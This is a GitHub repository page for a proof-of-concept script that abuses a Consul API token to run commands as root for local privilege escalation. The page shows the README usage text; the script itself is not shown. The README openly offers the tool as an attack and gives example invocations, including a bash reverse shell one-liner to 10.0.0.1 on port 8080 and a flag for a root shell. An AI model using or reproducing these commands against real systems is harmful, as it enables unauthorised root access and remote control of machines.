GitHub - cpu0x00/root-consul: PoC script to abuse the consul token to run commands or get shell as root for local privilege escalation

taking advantage of the consul api token to task commands to run as root

$ python3 root_c0nsul.py -h

usage: root_c0nsul.py [-h] --api_token API_TOKEN [--command COMMAND] [--root]

options:
  -h, --help            show this help message and exit
  --api_token API_TOKEN, -t API_TOKEN
                        the api token of the consul service
  --command COMMAND, -c COMMAND
                        command to be executed as root
  --root                get root shell ;)

poc for exploiting the consul service api to gain root privs

example1: $ python3 root_c0nsul.py -t <API_TOKEN> -c "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1" get a root revshell

example2: $ python3 root_c0nsul.py -t <API_TOKEN> -c "id" executes the command (id) as root

example3: $ python3 root_c0nsul.py -t <API_TOKEN> --root you know what does that do ;)

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commit
README.md		README.md
root_c0nsul.py		root_c0nsul.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

About

Releases

Packages

Languages

cpu0x00/root-consul

Folders and files

Latest commit

History

Repository files navigation

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages